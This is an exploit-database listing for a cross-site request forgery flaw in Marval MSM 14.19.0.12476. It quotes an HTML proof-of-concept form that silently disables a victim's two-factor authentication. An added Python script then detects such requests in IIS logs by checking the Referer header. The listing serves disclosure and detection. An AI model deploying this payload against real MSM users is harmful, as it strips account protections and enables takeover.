Marval MSM 14.19.0.12476 Cross Site Request Forgery

CVE: CVE-XXXX-XXXX
Category: CWE-352
Price: $5,000
Severity: High
Author: Unknown
Risk: Critical
Exploitation Type: Remote
Date: 2022-06-20
CPE: cpe:cpe:/a:marval:msm:14.19.0.12476
CVSS: CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
EPSS: 0.231
EPSSP: 0.24

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060061

Below is a copy:

Marval MSM 14.19.0.12476 Cross Site Request Forgery
# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
# 2FA Bypass:

<html>

  <body>
    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
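
A log check a defender could run for the request shape in the PoC above (an added example, not part of the original advisory or of Marval's code): it flags POSTs to ScriptHandler.ashx with method=DisableTwoFactorAuthentication whose Referer is off-site or absent. The IIS W3C field set, hostnames and IP addresses in the sample are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample in IIS W3C extended format (hosts and IPs are made up).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs-host cs(Referer) sc-status
2022-05-27 10:01:02 POST /MSM_Test/RFP/Forms/ScriptHandler.ashx method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx 198.51.100.7 msm.example.test https://msm.example.test/MSM_Test/RFP/Forms/Profile.aspx 200
2022-05-27 10:05:40 POST /MSM_Test/RFP/Forms/ScriptHandler.ashx method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx 198.51.100.9 msm.example.test https://other.example.net/page.html 200
2022-05-27 10:07:13 POST /MSM_Test/RFP/Forms/ScriptHandler.ashx method=DisableTwoFactorAuthentication 198.51.100.9 msm.example.test:443 - 200
2022-05-27 10:09:00 GET /MSM_Test/RFP/Forms/Profile.aspx - 198.51.100.7 msm.example.test https://msm.example.test/MSM_Test/ 200
"""

WATCHED_METHODS = {"disabletwofactorauthentication"}  # handler method named in the PoC

def classify(row):
    """Return None, 'cross-site' or 'no-referer' for one parsed log row."""
    if row["cs-method"] != "POST":
        return None
    if not row["cs-uri-stem"].lower().endswith("/scripthandler.ashx"):
        return None
    methods = parse_qs(row["cs-uri-query"]).get("method", [])
    if not any(m.lower() in WATCHED_METHODS for m in methods):
        return None
    referer = row["cs(Referer)"]
    if referer == "-":
        return "no-referer"  # Referer suppressed or stripped: needs manual review
    ref_host = (urlsplit(referer).hostname or "").lower()
    site_host = row["cs-host"].lower().split(":")[0]  # drop an optional port
    return None if ref_host == site_host else "cross-site"

def scan(log_text):
    """Return (date, time, client ip, verdict) for each suspicious row."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            verdict = classify(row)
            if verdict:
                hits.append((row["date"], row["time"], row["c-ip"], verdict))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The Referer header is only logged when the cs(Referer) field is enabled, and a same-site Referer does not prove the request was intended by the user, so this narrows review rather than replacing a server-side anti-CSRF token.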
